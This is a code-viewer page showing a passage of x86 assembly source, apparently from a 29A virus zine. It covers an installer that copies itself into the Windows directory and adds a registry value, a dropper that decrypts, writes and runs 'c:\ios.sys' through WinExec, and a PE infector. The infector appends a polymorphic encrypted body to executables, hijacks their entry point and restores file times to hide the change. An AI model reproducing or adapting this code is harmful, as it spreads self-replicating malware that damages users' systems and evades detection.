📄 29a-7.008
字号:
mov bh,byte [edi+ebx]
mov byte [edx+esi],bh
inc esi
inc eax
inc ebp
cmp ebp,24
ja addEndOfLine
inc ebp
addedEndOfLine:
sub ecx,3
or ecx,ecx
jnz baseLoop
mov ecx,esi
add edx,esi
pop ebp
ret
addEndOfLine:
xor ebp,ebp
mov word [edx+esi],0a0dh
add esi,2
jmp addedEndOfLine
; - auxf.inc EOF -
; - install.inc BOF -
[extern GetWindowsDirectoryA]
[extern lstrcat]
[extern RegOpenKeyExA]
[extern RegQueryValueExA]
[extern RegSetValueExA]
[extern RegCloseKey]
[extern CreateFileA]
[extern WriteFile]
[extern CloseHandle]
[extern GetVolumeInformationA]
install:
push ebp
mov ebp,esp
sub esp,260
push ebp
sub ebp,260
xor eax,eax
push eax
push eax
push eax
push eax
push dword regName
push eax
push eax
push dword drive
call GetVolumeInformationA
or eax,eax
jz near installKO
and dword [regName],0f0f0f0fh
or dword [regName],"abcd"
push dword 20h
call rnd
or eax,eax
jz near installOK
push dword hkey
push dword KEY_ALL_ACCESS
push dword 0
push dword regKey
push dword HKEY_LOCAL_MACHINE
call RegOpenKeyExA
or eax,eax
jnz near installKO
push eax
push eax
push dword localtime
push eax
push dword regName
push dword [hkey]
call RegQueryValueExA
or eax,eax
jz near installKO
push dword 260
push ebp
call GetWindowsDirectoryA
or eax,eax
jz near installKO
push dword iname
push ebp
call lstrcat
push dword 0
push dword 3
push dword 2
push dword 0
push dword 0
push dword 40000000h
push ebp
call CreateFileA
inc eax
jz installKO
dec eax
push eax
push dword 0
push dword localtime
push dword [vsize]
push dword [memory]
push eax
call WriteFile
call CloseHandle
push dword 260
push ebp
push dword REG_SZ
push dword 0
push dword regName
push dword [hkey]
call RegSetValueExA
push dword [hkey]
call RegCloseKey
installOK:
clc
mov al,0f9h
installKO equ $-1
pop ebp
leave
ret
; - install.inc EOF -
; - dropit.inc BOF -
KERNEL32 equ 0bff70000h
dropBegin:
push dword 12345678h
hostEP equ $-4
pushad
cmp byte [esp+27h],0bfh
jne near notWin9x
call k32Tip
mov eax,dword [eax+edi]
add eax,edi
mov ebp,eax
call decryptIt
call dropIt
call execIt
notWin9x:
popad
ret
dropIt:
mov ecx,3
mov ah,byte 3ch
call getDelta
add edx,file2drop
call int21h
jnc openok
ret
openok:
xchg eax,ebx
mov ah,40h
mov ecx,12345678h
dropSize equ $-4
call getDelta
add edx,data2drop
call int21h
mov ah,3eh
call int21h
ret
execIt:
call getDelta
mov ebp,edx
call k32Tip
add eax,edi
mov dword [address+ebp],eax
lodsd
add eax,edi
mov dword [names+ebp],eax
lodsd
add eax,edi
mov dword [ordinals+ebp],eax
xor edx,edx
lea esi,[winexecsz+ebp]
mov ecx,winexeclen
searchl:
push ecx
push esi
mov edi,dword [names+ebp]
add edi,edx
mov edi,dword [edi]
add edi,KERNEL32
rep cmpsb
je fFound
add edx,4
pop esi
pop ecx
jmp searchl
fFound:
pop esi
pop ecx
shr edx,1
add edx,dword [ordinals+ebp]
movzx ebx,word [edx]
shl ebx,2
add ebx,dword [address+ebp]
mov ecx,dword [ebx]
add ecx,KERNEL32
push dword 0
lea esi,[file2drop+ebp]
push esi
call ecx
ret
getDelta:
call delta
delta:
pop edx
sub edx,dword delta
ret
int21h:
push ecx
push eax
push dword 002a0010h
call ebp
ret
decryptIt:
call getDelta
mov ecx,[dropSize+edx]
add edx,data2drop
xor eax,eax
mov al,0ffh
cKey equ $-1
decryptItLoop:
xor byte [edx],al
not byte [edx]
inc edx
inc ax
loop decryptItLoop
ret
k32Tip:
mov edi,KERNEL32
mov esi,KERNEL32+3ch
lodsd
add eax,edi
xchg eax,esi
mov esi,dword [esi+78h]
add esi,dword 1ch+KERNEL32
lodsd
ret
winexecsz db "WinExec"
winexeclen equ $-winexecsz
address dd 0
names dd 0
ordinals dd 0
file2drop db 'c:\ios.sys',0
dropperSize equ $-dropBegin
data2drop:
; - dropit.inc EOF -
; - infectpe.inc BOF -
[extern CreateFileA]
[extern CloseHandle]
[extern GetFileAttributesA]
[extern SetFileAttributesA]
[extern GetFileSize]
[extern GetFileTime]
[extern SetFileTime]
[extern CreateFileMappingA]
[extern MapViewOfFile]
[extern UnmapViewOfFile]
PADDING equ 101
infectpe:
push esi
push esi
call GetFileAttributesA
pop esi
inc eax
jz near infectionError
dec eax
mov dword [fileAttrib],eax
push esi
push dword 80h
push esi
call SetFileAttributesA
pop esi
or eax,eax
jz near infectionError
push esi
push dword 0
push dword 80h
push dword 3
push dword 0
push dword 0
push dword (80000000h | 40000000h)
push esi
call CreateFileA
inc eax
jz near infectionErrorAttrib
dec eax
mov [fHnd],eax
push dword 0
push eax
call GetFileSize
inc eax
jz near infectionErrorClose
dec eax
mov [fileSize],eax
push dword fileTime2
push dword fileTime1
push dword fileTime0
push dword [fHnd]
call GetFileTime
or eax,eax
jz near infectionErrorClose
xor eax,eax
push eax
push eax
push eax
push dword 4
push eax
push dword [fHnd]
call CreateFileMappingA
or eax,eax
jz near infectionErrorClose
mov dword [fhmap],eax
xor eax,eax
push eax
push eax
push eax
push dword 6
push dword [fhmap]
call MapViewOfFile
or eax,eax
jz near infectionErrorCloseMap
mov [mapMem],eax
mov edi,eax
cmp word [edi],'MZ'
jne near infectionErrorCloseUnmap
add edi,[edi+3ch]
cmp eax,edi
jae near infectionErrorCloseUnmap
add eax,[fileSize]
cmp eax,edi
jbe near infectionErrorCloseUnmap
cmp word [edi],'PE'
jne near infectionErrorCloseUnmap
movzx edx,word [edi+16h]
test edx,2h
jz near infectionErrorCloseUnmap
and edx,2000h
jnz near infectionErrorCloseUnmap
mov dx,[edi+5ch]
dec edx
jz near infectionErrorCloseUnmap
cmp word [edi+1ch],0
je near infectionErrorCloseUnmap
mov esi,edi
mov eax,18h
add ax,[edi+14h]
add edi,eax
mov cx,[esi+06h]
dec cx
mov eax,28h
mul cx
add edi,eax
mov ecx,[edi+14h]
add ecx,[edi+10h]
cmp ecx,[fileSize]
jne near infectionErrorCloseUnmap
mov eax,[edi+0ch]
add eax,[edi+10h]
mov [crptBegin],eax
xchg eax,[esi+28h]
mov ecx,[esi+34h]
add [crptBegin],ecx
add dword [crptBegin],5
add eax,ecx
mov [hostEP],eax
pushad
mov edi,[poly]
mov al,0e8h
stosb
xor eax,eax
add eax,dropperSize
add eax,[vsize]
stosd
lea esi,[dropBegin]
mov ecx,dropperSize
rep movsb
mov esi,[memory]
mov ecx,[vsize]
rep movsb
mov esi,[crptBegin]
call genPolyData
mov [polySize],ecx
popad
xor eax,eax
mov [esi+58h],eax
or dword [edi+24h],0c0000000h
mov eax,dropperSize+5
add eax,[vsize]
add eax,[polySize]
push eax
add eax,[edi+10h]
mov ecx,[esi+3ch]
xor edx,edx
div ecx
inc eax
mul ecx
mov [edi+10h],eax
add eax,[edi+0ch]
mov ecx,[esi+38h]
xor edx,edx
div ecx
inc eax
mul ecx
mov [esi+50h],eax
sub eax,[edi+0ch]
mov [edi+08h],eax
pop eax
add eax,[fileSize]
mov ecx,PADDING
xor edx,edx
div ecx
inc eax
mul ecx
mov [padding],eax
push dword [mapMem]
call UnmapViewOfFile
push dword [fhmap]
call CloseHandle
xor eax,eax
push eax
push dword [padding]
push eax
push dword 4
push eax
push dword [fHnd]
call CreateFileMappingA
or eax,eax
jz infectionErrorClose
mov [fhmap],eax
xor eax,eax
push dword [padding]
push eax
push eax
push dword 6
push dword [fhmap]
call MapViewOfFile
or eax,eax
jz infectionErrorCloseMap
mov [mapMem],eax
mov ecx,dropperSize+5
add ecx,[vsize]
add ecx,[polySize]
mov esi,[poly]
mov edi,eax
add edi,dword [fileSize]
rep movsb
infectionErrorCloseUnmap:
push dword [mapMem]
call UnmapViewOfFile
infectionErrorCloseMap:
push dword [fhmap]
call CloseHandle
push dword fileTime2
push dword fileTime1
push dword fileTime0
push dword [fHnd]
call SetFileTime
infectionErrorClose:
push dword [fHnd]
call CloseHandle
infectionErrorAttrib:
pop esi
push dword [fileAttrib]
push esi
call SetFileAttributesA
infectionError:
ret
genPolyData:
push dword MAXLAYER/2
call rnd
add eax,MAXLAYER/2
mov [lCnt],eax
mov ecx,eax
push edi
genPolyDataL:
push esi
push ecx
push edi
mov ecx,dropperSize
add ecx,[vsize]
call brepoge
pop edi
add edi,ecx
pop ecx
mov eax,[vKey]
mov [kStack-4+ecx*4],eax
mov eax,[mKey]
mov [mStack-4+ecx*4],eax
pop esi
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -